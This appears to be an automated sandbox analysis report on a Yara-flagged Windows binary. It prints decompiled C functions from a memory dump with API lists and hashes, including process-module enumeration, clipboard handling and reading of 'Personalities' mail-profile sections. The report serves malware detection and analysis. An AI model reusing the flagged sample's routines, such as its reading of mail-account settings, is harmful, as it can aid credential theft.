                                                                        								_v316 = _t94;
                                                                        								strcpy( &_v308,  &_v844);
                                                                        								_v44 = _v1108;
                                                                        								_t107 = _t107 + 0x14;
                                                                        								_v40 = _v1112;
                                                                        								_v1132 = 0x224;
                                                                        								if(E0040E45F(_a8,  &_v316) != 0) {
                                                                        									_t64 =  *0x416fd4(_v8,  &_v1132);
                                                                        									continue;
                                                                        								}
                                                                        								goto L18;
                                                                        							}
                                                                        							goto L18;
                                                                        						}
                                                                        					}
                                                                        				} else {
                                                                        					_t77 = OpenProcess(0x410, 0, _a4);
                                                                        					_v8 = _t77;
                                                                        					if(_t77 != 0) {
                                                                        						_push( &_v16);
                                                                        						_push(0x4000);
                                                                        						_push( &_v17516);
                                                                        						_push(_t77);
                                                                        						if( *0x416fe4() != 0) {
                                                                        							_t6 =  &_v16;
                                                                        							 *_t6 = _v16 >> 2;
                                                                        							_v20 = 1;
                                                                        							_v12 = 0;
                                                                        							if( *_t6 != 0) {
                                                                        								while(1) {
                                                                        									_v580 = 0;
                                                                        									memset( &_v579, _t102, 0x104);
                                                                        									memset( &_v316, _t102, 0x118);
                                                                        									_t84 =  *((intOrPtr*)(_t106 + _v12 * 4 - 0x4468));
                                                                        									_t107 = _t107 + 0x18;
                                                                        									_v316 = _a4;
                                                                        									_v312 = _t84;
                                                                        									 *0x416fdc(_v8, _t84,  &_v580, 0x104);
                                                                        									E0040E172( &_v308,  &_v580);
                                                                        									_push(0xc);
                                                                        									_push( &_v32);
                                                                        									_push(_v312);
                                                                        									_push(_v8);
                                                                        									if( *0x416fe8() != 0) {
                                                                        										_v44 = _v28;
                                                                        										_v40 = _v32;
                                                                        									}
                                                                        									if(E0040E45F(_a8,  &_v316) == 0) {
                                                                        										goto L18;
                                                                        									}
                                                                        									_v12 = _v12 + 1;
                                                                        									if(_v12 < _v16) {
                                                                        										_t102 = 0;
                                                                        										continue;
                                                                        									} else {
                                                                        									}
                                                                        									goto L18;
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        						L18:
                                                                        						CloseHandle(_v8);
                                                                        					}
                                                                        				}
                                                                        				return _v20;
                                                                        			}

































                                                                        APIs
                                                                        • OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,0040DD5F,00000000,00000000), ref: 0040E28C
                                                                        • memset.MSVCRT ref: 0040E2E9
                                                                        • memset.MSVCRT ref: 0040E2FB
                                                                          • Part of subcall function 0040E172: strcpy.MSVCRT(?,-00000001), ref: 0040E198
                                                                        • memset.MSVCRT ref: 0040E3E2
                                                                        • strcpy.MSVCRT(?,?,?,00000000,00000118), ref: 0040E407
                                                                        • CloseHandle.KERNEL32(00000000,0040DD5F,?), ref: 0040E451
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: memset$strcpy$CloseHandleOpenProcess
                                                                        • String ID:
                                                                        • API String ID: 3799309942-0
                                                                        • Opcode ID: 090a920ccff3a4e303efb007cbafe5d1b02941aedbce4837af1c52a6e7a2511d
                                                                        • Instruction ID: 14fca006082a3f7ea55a807dd49808cd12c96cdbdfea8439eb00a9ee5a281ce1
                                                                        • Opcode Fuzzy Hash: 090a920ccff3a4e303efb007cbafe5d1b02941aedbce4837af1c52a6e7a2511d
                                                                        • Instruction Fuzzy Hash: A2512DB1900218ABDB10DF95DC85ADEBBB8FF44304F1045AAF609B6291D7749F90CF69
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 73%
                                                                        			E00410A8A(void* __ecx, void* __eflags, intOrPtr* _a4, int _a8) {
                                                                        				void* _v8;
                                                                        				intOrPtr* _v12;
                                                                        				intOrPtr _v24;
                                                                        				intOrPtr _v28;
                                                                        				intOrPtr _v32;
                                                                        				intOrPtr _v288;
                                                                        				intOrPtr _v800;
                                                                        				char _v1568;
                                                                        				char _v1824;
                                                                        				intOrPtr _v1828;
                                                                        				intOrPtr _v1840;
                                                                        				intOrPtr _v1844;
                                                                        				intOrPtr _v2100;
                                                                        				intOrPtr _v2612;
                                                                        				char _v3124;
                                                                        				char _v3636;
                                                                        				intOrPtr _v3640;
                                                                        				void* _v5768;
                                                                        				char _v5796;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				char* _t39;
                                                                        				intOrPtr _t51;
                                                                        				int _t60;
                                                                        				intOrPtr* _t73;
                                                                        				int _t76;
                                                                        				void* _t80;
                                                                        
                                                                        				_t80 = __eflags;
                                                                        				E004118A0(0x16a0, __ecx);
                                                                        				_t39 = wcslen(_a8);
                                                                        				_t2 =  &(_t39[1]); // 0x1
                                                                        				_t76 = _t2;
                                                                        				_push(_t76);
                                                                        				L004115D0();
                                                                        				_t60 = 0;
                                                                        				_v8 = _t39;
                                                                        				 *_t39 = 0;
                                                                        				WideCharToMultiByte(0, 0, _a8, 0xffffffff, _t39, _t76, 0, 0);
                                                                        				_t77 =  &_v5796;
                                                                        				E0040FE05( &_v5796, _t80);
                                                                        				_v5796 = 0x4144ac;
                                                                        				E004104BC( &_v3636);
                                                                        				E004104BC( &_v1824);
                                                                        				_t73 = _a4;
                                                                        				_v3640 =  *((intOrPtr*)(_t73 + 4));
                                                                        				_v12 = _t73;
                                                                        				_a8 = strlen(_v8);
                                                                        				E0040FF76(_t47, _t77);
                                                                        				memcpy(_v5768, _v8, _a8);
                                                                        				E00410081(_t77, _t80);
                                                                        				_t51 =  *((intOrPtr*)(_t73 + 4));
                                                                        				_v1840 = _t51;
                                                                        				_v28 = _t51;
                                                                        				if(_v2100 != 0 || _v2612 != 0) {
                                                                        					if(_v1844 != _t60) {
                                                                        						if(_v1568 != _t60) {
                                                                        							E004060D0(0xff,  &_v3124,  &_v1568);
                                                                        							_t73 = _a4;
                                                                        							_v1828 = _v24;
                                                                        							_t60 = 0;
                                                                        						}
                                                                        						 *((intOrPtr*)( *_t73))( &_v3636);
                                                                        					}
                                                                        				}
                                                                        				if(_v288 != _t60 || _v800 != _t60) {
                                                                        					if(_v32 != _t60) {
                                                                        						 *((intOrPtr*)( *_t73))( &_v1824);
                                                                        					}
                                                                        				}
                                                                        				_push(_v8);
                                                                        				L004115D6();
                                                                        				return E0040FEED( &_v5796);
                                                                        			}
































                                                                        APIs
                                                                        • wcslen.MSVCRT ref: 00410A9D
                                                                        • ??2@YAPAXI@Z.MSVCRT ref: 00410AA6
                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00410C2C,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,00410C2C,?,00000000), ref: 00410ABF
                                                                          • Part of subcall function 0040FE05: ??2@YAPAXI@Z.MSVCRT ref: 0040FE1A
                                                                          • Part of subcall function 0040FE05: ??2@YAPAXI@Z.MSVCRT ref: 0040FE38
                                                                          • Part of subcall function 0040FE05: ??2@YAPAXI@Z.MSVCRT ref: 0040FE53
                                                                          • Part of subcall function 0040FE05: ??2@YAPAXI@Z.MSVCRT ref: 0040FE7C
                                                                          • Part of subcall function 0040FE05: ??2@YAPAXI@Z.MSVCRT ref: 0040FEA0
                                                                        • strlen.MSVCRT ref: 00410B02
                                                                          • Part of subcall function 0040FF76: ??3@YAXPAX@Z.MSVCRT ref: 0040FF81
                                                                          • Part of subcall function 0040FF76: ??2@YAPAXI@Z.MSVCRT ref: 0040FF90
                                                                        • memcpy.MSVCRT ref: 00410B1C
                                                                        • ??3@YAXPAX@Z.MSVCRT ref: 00410BAF
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ??2@$??3@$ByteCharMultiWidememcpystrlenwcslen
                                                                        • String ID:
                                                                        • API String ID: 577244452-0
                                                                        • Opcode ID: eda384fdfc038d1513b3794fcc6cadf0bacc3feb473f8e14eb1b45133d0eb622
                                                                        • Instruction ID: 5b66efc9566b80317fa540751e9ebc59d69584110078b55da7be64cca713082c
                                                                        • Opcode Fuzzy Hash: eda384fdfc038d1513b3794fcc6cadf0bacc3feb473f8e14eb1b45133d0eb622
                                                                        • Instruction Fuzzy Hash: 44317672804219AFCF21EFA1C8809EDBBB5AF44314F1440AAE508A3251DB796FC4CF98
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 72%
                                                                        			E00406491(void* __edx, struct HWND__* _a4) {
                                                                        				int _v8;
                                                                        				struct tagRECT _v24;
                                                                        				int _t17;
                                                                        				void* _t36;
                                                                        				struct HDC__* _t38;
                                                                        
                                                                        				_t36 = __edx;
                                                                        				_t38 = GetDC(0);
                                                                        				_t17 = GetDeviceCaps(_t38, 8);
                                                                        				_v8 = GetDeviceCaps(_t38, 0xa);
                                                                        				ReleaseDC(0, _t38);
                                                                        				GetWindowRect(_a4,  &_v24);
                                                                        				asm("cdq");
                                                                        				asm("cdq");
                                                                        				return MoveWindow(_a4, _v24.left - _v24.right + _t17 - 1 - _t36 >> 1, _v24.top - _v24.bottom + _v8 - 1 - _v8 >> 1, _v24.right - _v24.left + 1, _v24.bottom - _v24.top + 1, 1);
                                                                        			}









                                                                        APIs
                                                                        • GetDC.USER32(00000000), ref: 0040649C
                                                                        • GetDeviceCaps.GDI32(00000000,00000008), ref: 004064AD
                                                                        • GetDeviceCaps.GDI32(00000000,0000000A), ref: 004064B4
                                                                        • ReleaseDC.USER32 ref: 004064BC
                                                                        • GetWindowRect.USER32 ref: 004064C9
                                                                        • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00406507
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CapsDeviceWindow$MoveRectRelease
                                                                        • String ID:
                                                                        • API String ID: 3197862061-0
                                                                        • Opcode ID: 69bb305ff33d1457d4484e576323a0ef66f31560397ccb35d966ff8f0e758d9b
                                                                        • Instruction ID: 542b186de9fc11de55873c3549d90df3c6ab5362d14aa96611489808ae4c73e2
                                                                        • Opcode Fuzzy Hash: 69bb305ff33d1457d4484e576323a0ef66f31560397ccb35d966ff8f0e758d9b
                                                                        • Instruction Fuzzy Hash: FC117C31A0011AAFDB009BB9CE4DEEFBFB8EB84711F014165E901E7250D6B0AD01CBA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 95%
                                                                        			E00403A8D(void* __ecx, void* __eflags, void* _a4, char* _a8) {
                                                                        				long _v8;
                                                                        				void _v8199;
                                                                        				char _v8200;
                                                                        				void _v24582;
                                                                        				short _v24584;
                                                                        
                                                                        				E004118A0(0x6004, __ecx);
                                                                        				_v24584 = 0;
                                                                        				memset( &_v24582, 0, 0x3ffe);
                                                                        				_v8200 = 0;
                                                                        				memset( &_v8199, 0, 0x1fff);
                                                                        				MultiByteToWideChar(0, 0, _a8, 0xffffffff,  &_v24584, 0x1fff);
                                                                        				WideCharToMultiByte(0xfde9, 0,  &_v24584, 0xffffffff,  &_v8200, 0x1fff, 0, 0);
                                                                        				return WriteFile(_a4,  &_v8200, strlen( &_v8200),  &_v8, 0);
                                                                        			}









                                                                        APIs
                                                                        • memset.MSVCRT ref: 00403AB2
                                                                        • memset.MSVCRT ref: 00403ACB
                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF), ref: 00403AE2
                                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00403B01
                                                                        • strlen.MSVCRT ref: 00403B13
                                                                        • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403B24
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ByteCharMultiWidememset$FileWritestrlen
                                                                        • String ID:
                                                                        • API String ID: 1786725549-0
                                                                        • Opcode ID: f625be7e6fa724cc13b0b56902c1b33cd6369ef039f23dbe168f1e8392359ec1
                                                                        • Instruction ID: d8056d974a042835a8b53dd5956248081512f57f3cb7fafeec888b91cb2496ed
                                                                        • Opcode Fuzzy Hash: f625be7e6fa724cc13b0b56902c1b33cd6369ef039f23dbe168f1e8392359ec1
                                                                        • Instruction Fuzzy Hash: 6A1161B244012CBEFB009B94DD85DEB77ADEF08354F0041A6B70AD2091D6349F94CB78
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E0040AC8A(void* __eax, void* __ebx) {
                                                                        				char _v264;
                                                                        				char _v524;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				long _t13;
                                                                        				void* _t18;
                                                                        				int _t19;
                                                                        				long _t20;
                                                                        				void* _t27;
                                                                        				void* _t31;
                                                                        
                                                                        				_t27 = __ebx;
                                                                        				_t31 = __eax;
                                                                        				_t13 = GetTempPathA(0x104,  &_v524);
                                                                        				_t32 = _t13;
                                                                        				if(_t13 == 0) {
                                                                        					GetWindowsDirectoryA( &_v524, 0x104);
                                                                        				}
                                                                        				_v264 = 0;
                                                                        				GetTempFileNameA( &_v524, "cp", 0,  &_v264);
                                                                        				_t18 = E0040AC47(_t31, _t32,  &_v264, 2, 1);
                                                                        				if(_t18 != 0) {
                                                                        					_t19 = OpenClipboard( *(_t31 + 0x108));
                                                                        					_t34 = _t19;
                                                                        					if(_t19 == 0) {
                                                                        						_t20 = GetLastError();
                                                                        					} else {
                                                                        						_t20 = E00405FC6(_t27, 0x104, _t31, _t34,  &_v264);
                                                                        					}
                                                                        					if(_t20 != 0) {
                                                                        						E00405F41(_t20,  *(_t31 + 0x108));
                                                                        					}
                                                                        					return DeleteFileA( &_v264);
                                                                        				}
                                                                        				return _t18;
                                                                        			}














                                                                        APIs
                                                                        • GetTempPathA.KERNEL32(00000104,?), ref: 0040ACA4
                                                                        • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040ACB6
                                                                        • GetTempFileNameA.KERNEL32(?,0041341C,00000000,?), ref: 0040ACD8
                                                                        • OpenClipboard.USER32(?), ref: 0040ACF8
                                                                        • GetLastError.KERNEL32 ref: 0040AD11
                                                                        • DeleteFileA.KERNEL32(00000000), ref: 0040AD2E
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FileTemp$ClipboardDeleteDirectoryErrorLastNameOpenPathWindows
                                                                        • String ID:
                                                                        • API String ID: 2014771361-0
                                                                        • Opcode ID: 04f759ef316dfc5a7bfb4e8c49b84bbeab9ff02a57951bdc03c1b9a7e5f51390
                                                                        • Instruction ID: 1632bef886f39339d389646b63a05c30f7573d4ca20e624e383ab74febbb07e7
                                                                        • Opcode Fuzzy Hash: 04f759ef316dfc5a7bfb4e8c49b84bbeab9ff02a57951bdc03c1b9a7e5f51390
                                                                        • Instruction Fuzzy Hash: E0118272504318ABDB209B60DD49FDB77BC9F14701F0001B6F689E2091DBB8DAD4CB29
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 86%
                                                                        			E00406585(char* __edi, intOrPtr _a4, signed int _a8) {
                                                                        				void _v259;
                                                                        				char _v260;
                                                                        				char* _t34;
                                                                        				signed int _t35;
                                                                        				void* _t36;
                                                                        				void* _t37;
                                                                        
                                                                        				_t34 = __edi;
                                                                        				_v260 = 0;
                                                                        				memset( &_v259, 0, 0xfe);
                                                                        				_t37 = _t36 + 0xc;
                                                                        				 *__edi = 0;
                                                                        				_t35 = 0;
                                                                        				do {
                                                                        					_push( *(_t35 + _a4) & 0x000000ff);
                                                                        					sprintf( &_v260, "%2.2X");
                                                                        					_t37 = _t37 + 0xc;
                                                                        					if(_t35 > 0) {
                                                                        						strcat(_t34, " ");
                                                                        					}
                                                                        					if(_a8 > 0) {
                                                                        						asm("cdq");
                                                                        						if(_t35 % _a8 == 0) {
                                                                        							strcat(_t34, "  ");
                                                                        						}
                                                                        					}
                                                                        					strcat(_t34,  &_v260);
                                                                        					_t35 = _t35 + 1;
                                                                        				} while (_t35 < 0x80);
                                                                        				return _t34;
                                                                        			}










                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: strcat$memsetsprintf
                                                                        • String ID: %2.2X
                                                                        • API String ID: 582077193-791839006
                                                                        • Opcode ID: f03ef531f1dceed6107a024529effe878a92871925f9b5c2fb8bf99f2bcc600c
                                                                        • Instruction ID: 9ba21b13147b7bc42f3eaeb5b708c7057566a78b4f06b3a82068ff28b5e275af
                                                                        • Opcode Fuzzy Hash: f03ef531f1dceed6107a024529effe878a92871925f9b5c2fb8bf99f2bcc600c
                                                                        • Instruction Fuzzy Hash: 54014C7294421476D7315725ED03BEA379C9B84704F10407FF986A61C5EABCDBD48798
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 77%
                                                                        			E0040FEED(intOrPtr* __edi) {
                                                                        				void* __esi;
                                                                        				signed int _t9;
                                                                        				intOrPtr* _t16;
                                                                        				intOrPtr _t18;
                                                                        				intOrPtr _t19;
                                                                        				intOrPtr _t20;
                                                                        				intOrPtr _t21;
                                                                        				intOrPtr _t22;
                                                                        
                                                                        				_t16 = __edi;
                                                                        				_t9 =  *(__edi + 0x1c);
                                                                        				 *__edi = 0x414288;
                                                                        				if(_t9 != 0) {
                                                                        					_push(_t9);
                                                                        					L004115D6();
                                                                        					 *(__edi + 0x1c) =  *(__edi + 0x1c) & 0x00000000;
                                                                        				}
                                                                        				_t18 =  *((intOrPtr*)(_t16 + 0x460));
                                                                        				if(_t18 != 0) {
                                                                        					_t9 = E00406B5B(_t18);
                                                                        					_push(_t18);
                                                                        					L004115D6();
                                                                        				}
                                                                        				_t19 =  *((intOrPtr*)(_t16 + 0x45c));
                                                                        				if(_t19 != 0) {
                                                                        					_t9 = E00406B5B(_t19);
                                                                        					_push(_t19);
                                                                        					L004115D6();
                                                                        				}
                                                                        				_t20 =  *((intOrPtr*)(_t16 + 0x458));
                                                                        				if(_t20 != 0) {
                                                                        					_t9 = E00406B5B(_t20);
                                                                        					_push(_t20);
                                                                        					L004115D6();
                                                                        				}
                                                                        				_t21 =  *((intOrPtr*)(_t16 + 0x454));
                                                                        				if(_t21 != 0) {
                                                                        					_t9 = E00406A4E(_t21);
                                                                        					_push(_t21);
                                                                        					L004115D6();
                                                                        				}
                                                                        				_t22 =  *((intOrPtr*)(_t16 + 0x450));
                                                                        				if(_t22 != 0) {
                                                                        					_t9 = E00406A4E(_t22);
                                                                        					_push(_t22);
                                                                        					L004115D6();
                                                                        				}
                                                                        				return _t9;
                                                                        			}












                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ??3@
                                                                        • String ID:
                                                                        • API String ID: 613200358-0
                                                                        • Opcode ID: ea111159704be43e2a104ffdb8d509d36bb5885e2519feaa300ca6788f6abc2c
                                                                        • Instruction ID: b81094b12df4fb27198692459327ff2c1ceec6e662cd9000025ff3e54110b63d
                                                                        • Opcode Fuzzy Hash: ea111159704be43e2a104ffdb8d509d36bb5885e2519feaa300ca6788f6abc2c
                                                                        • Instruction Fuzzy Hash: B0015E72A029322AC5257B26680178AA3557F41B14B06013FFA0577B824F7C799246ED
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 36%
                                                                        			E004078FF(signed short __ebx) {
                                                                        				signed int _t17;
                                                                        				void* _t18;
                                                                        				intOrPtr _t23;
                                                                        				void* _t31;
                                                                        				signed short _t39;
                                                                        				signed int _t40;
                                                                        				void* _t51;
                                                                        				int _t56;
                                                                        				void* _t57;
                                                                        				int _t67;
                                                                        
                                                                        				_t39 = __ebx;
                                                                        				if( *0x417540 == 0) {
                                                                        					E0040787D();
                                                                        				}
                                                                        				_t40 =  *0x417538;
                                                                        				_t17 = 0;
                                                                        				if(_t40 <= 0) {
                                                                        					L5:
                                                                        					_t51 = 0;
                                                                        				} else {
                                                                        					while(_t39 !=  *((intOrPtr*)( *0x417530 + _t17 * 4))) {
                                                                        						_t17 = _t17 + 1;
                                                                        						if(_t17 < _t40) {
                                                                        							continue;
                                                                        						} else {
                                                                        							goto L5;
                                                                        						}
                                                                        						goto L6;
                                                                        					}
                                                                        					_t51 =  *((intOrPtr*)( *0x417534 + _t17 * 4)) +  *0x417528;
                                                                        				}
                                                                        				L6:
                                                                        				if(_t51 != 0) {
                                                                        					L22:
                                                                        					_t18 = _t51;
                                                                        				} else {
                                                                        					if((_t39 & 0x00010000) == 0) {
                                                                        						if( *0x4171b8 == 0) {
                                                                        							_push( *0x417548 - 1);
                                                                        							_push( *0x41752c);
                                                                        							_push(_t39);
                                                                        							_push(E00407A55());
                                                                        							goto L16;
                                                                        						} else {
                                                                        							strcpy(0x4172c0, "strings");
                                                                        							_t31 = E00407D89(_t39,  *0x41752c);
                                                                        							_t57 = _t57 + 0x10;
                                                                        							if(_t31 == 0) {
                                                                        								L14:
                                                                        								_push( *0x417548 - 1);
                                                                        								_push( *0x41752c);
                                                                        								_push(_t39);
                                                                        								goto L9;
                                                                        							} else {
                                                                        								_t56 = strlen( *0x41752c);
                                                                        								if(_t56 == 0) {
                                                                        									goto L14;
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        					} else {
                                                                        						_push( *0x417548 - 1);
                                                                        						_push( *0x41752c);
                                                                        						_push(_t39 & 0x0000ffff);
                                                                        						L9:
                                                                        						_push( *0x416b94);
                                                                        						L16:
                                                                        						_t56 = LoadStringA();
                                                                        						_t67 = _t56;
                                                                        					}
                                                                        					if(_t67 <= 0) {
                                                                        						L21:
                                                                        						_t18 = 0x412466;
                                                                        					} else {
                                                                        						_t23 =  *0x41753c;
                                                                        						if(_t23 + _t56 + 2 >=  *0x417540 ||  *0x417538 >=  *0x417544) {
                                                                        							goto L21;
                                                                        						} else {
                                                                        							_t51 = _t23 +  *0x417528;
                                                                        							_t10 = _t56 + 1; // 0x1
                                                                        							memcpy(_t51,  *0x41752c, _t10);
                                                                        							 *((intOrPtr*)( *0x417534 +  *0x417538 * 4)) =  *0x41753c;
                                                                        							 *( *0x417530 +  *0x417538 * 4) = _t39;
                                                                        							 *0x417538 =  *0x417538 + 1;
                                                                        							 *0x41753c =  *0x41753c + _t56 + 1;
                                                                        							if(_t51 != 0) {
                                                                        								goto L22;
                                                                        							} else {
                                                                        								goto L21;
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				return _t18;
                                                                        			}














                                                                        APIs
                                                                        • strcpy.MSVCRT(004172C0,strings,?,?,00408822,?,?,?,?,?,00000000,73B74DE0), ref: 0040797A
                                                                          • Part of subcall function 00407D89: _itoa.MSVCRT ref: 00407DAA
                                                                        • strlen.MSVCRT ref: 00407998
                                                                        • LoadStringA.USER32 ref: 004079C8
                                                                        • memcpy.MSVCRT ref: 00407A07
                                                                          • Part of subcall function 0040787D: ??2@YAPAXI@Z.MSVCRT ref: 004078A5
                                                                          • Part of subcall function 0040787D: ??2@YAPAXI@Z.MSVCRT ref: 004078C3
                                                                          • Part of subcall function 0040787D: ??2@YAPAXI@Z.MSVCRT ref: 004078E1
                                                                          • Part of subcall function 0040787D: ??2@YAPAXI@Z.MSVCRT ref: 004078F1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp Download File
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ??2@$LoadString_itoamemcpystrcpystrlen
                                                                        • String ID: strings
                                                                        • API String ID: 1748916193-3030018805
                                                                        • Opcode ID: bf392a6dacac5d0c9eb1169d992c8844a823b81d6c84b2abf61d961779fc3ee1
                                                                        • Instruction ID: bfec9983b2359add980c5e43b0d452c2fda20e15e3ba6c634c10b5a9b6e313b6
                                                                        • Opcode Fuzzy Hash: bf392a6dacac5d0c9eb1169d992c8844a823b81d6c84b2abf61d961779fc3ee1
                                                                        • Instruction Fuzzy Hash: F73189B1A8C101BFD7159B59FD80DB63377EB84304710807AE902A7AB1E639B851CF9D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E0040329E(void* __fp0, intOrPtr _a4) {
                                                                        				int _v8;
                                                                        				char _v12;
                                                                        				char _v13;
                                                                        				char _v14;
                                                                        				char _v15;
                                                                        				void _v1035;
                                                                        				char _v1036;
                                                                        				char _v1968;
                                                                        				char _v2900;
                                                                        				void* __esi;
                                                                        				void* _t23;
                                                                        				int _t30;
                                                                        				char* _t31;
                                                                        				CHAR* _t49;
                                                                        				void* _t50;
                                                                        				void* _t55;
                                                                        
                                                                        				_t62 = __fp0;
                                                                        				_t49 = _a4 + 0xd2a;
                                                                        				if( *_t49 != 0) {
                                                                        					_t52 =  &_v1968;
                                                                        					E004021D8( &_v1968);
                                                                        					if(E0040314D(_t52, _t49, 0) != 0) {
                                                                        						E00402407(_t52, __fp0, _a4);
                                                                        					}
                                                                        					_v1036 = 0;
                                                                        					memset( &_v1035, 0, 0x400);
                                                                        					_t30 = GetPrivateProfileSectionA("Personalities",  &_v1036, 0x3fe, _t49);
                                                                        					if(_t30 <= 0) {
                                                                        						L11:
                                                                        						return _t30;
                                                                        					} else {
                                                                        						_v12 = 0;
                                                                        						_v13 = 0;
                                                                        						_v14 = 0;
                                                                        						_v15 = 0;
                                                                        						_t50 = 0;
                                                                        						_t31 =  &_v1036;
                                                                        						while(1) {
                                                                        							_t30 = strlen(_t31);
                                                                        							_v8 = _t30;
                                                                        							if(_t30 <= 0) {
                                                                        								goto L11;
                                                                        							}
                                                                        							_t54 =  &_v2900;
                                                                        							E004021D8( &_v2900);
                                                                        							if(strchr(_t55 + _t50 - 0x408, 0x3d) != 0 && E0040314D(_t54, _a4 + 0xd2a, _t34 + 1) != 0) {
                                                                        								E00402407(_t54, _t62, _a4);
                                                                        							}
                                                                        							_t30 = _v8;
                                                                        							_t50 = _t50 + _t30 + 1;
                                                                        							if(_t50 >= 0x3ff) {
                                                                        								goto L11;
                                                                        							} else {
                                                                        								_t31 = _t55 + _t50 - 0x408;
                                                                        								continue;
                                                                        							}
                                                                        						}
                                                                        						goto L11;
                                                                        					}
                                                                        				}
                                                                        				return _t23;
                                                                        			}

                                                                        APIs
                                                                          • Part of subcall function 0040314D: strchr.MSVCRT ref: 00403262
                                                                        • memset.MSVCRT ref: 004032F2
                                                                        • GetPrivateProfileSectionA.KERNEL32 ref: 0040330C
                                                                        • strchr.MSVCRT ref: 00403341
                                                                          • Part of subcall function 00402407: _mbsicmp.MSVCRT ref: 0040243F
                                                                        • strlen.MSVCRT ref: 00403383
                                                                          • Part of subcall function 00402407: _mbscmp.MSVCRT ref: 0040241B
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp Download File
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: strchr$PrivateProfileSection_mbscmp_mbsicmpmemsetstrlen
                                                                        • String ID: Personalities
                                                                        • API String ID: 2103853322-4287407858
                                                                        • Opcode ID: e3fa63d939a05486987fea06324786367eab17663f8cebe7d255cc1b6eb769cc
                                                                        • Instruction ID: ece583472a64ba9cf1aca627ef0740b0f3020b1d2d3fce26046d940835a048de
                                                                        • Opcode Fuzzy Hash: e3fa63d939a05486987fea06324786367eab17663f8cebe7d255cc1b6eb769cc
                                                                        • Instruction Fuzzy Hash: 8C21BA72A00108AADB119F69DD81ADE7F6C9F50349F0040BBEA45F3181DA38EF86866D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 68%
                                                                        			E0040F037(intOrPtr _a4) {
                                                                        				_Unknown_base(*)()* _t3;
                                                                        				void* _t7;
                                                                        				struct HINSTANCE__* _t8;
                                                                        
                                                                        				_t7 = 0;
                                                                        				_t8 = LoadLibraryA("shlwapi.dll");
                                                                        				_t3 = GetProcAddress(_t8, "SHAutoComplete");
                                                                        				if(_t3 != 0) {
                                                                        					_t7 =  *_t3(_a4, 0x10000001);
                                                                        				}
                                                                        				FreeLibrary(_t8);
                                                                        				return _t7;
                                                                        			}

                                                                        APIs
                                                                        • LoadLibraryA.KERNEL32(shlwapi.dll,000003ED,745D48C0,00405C41,00000000), ref: 0040F040
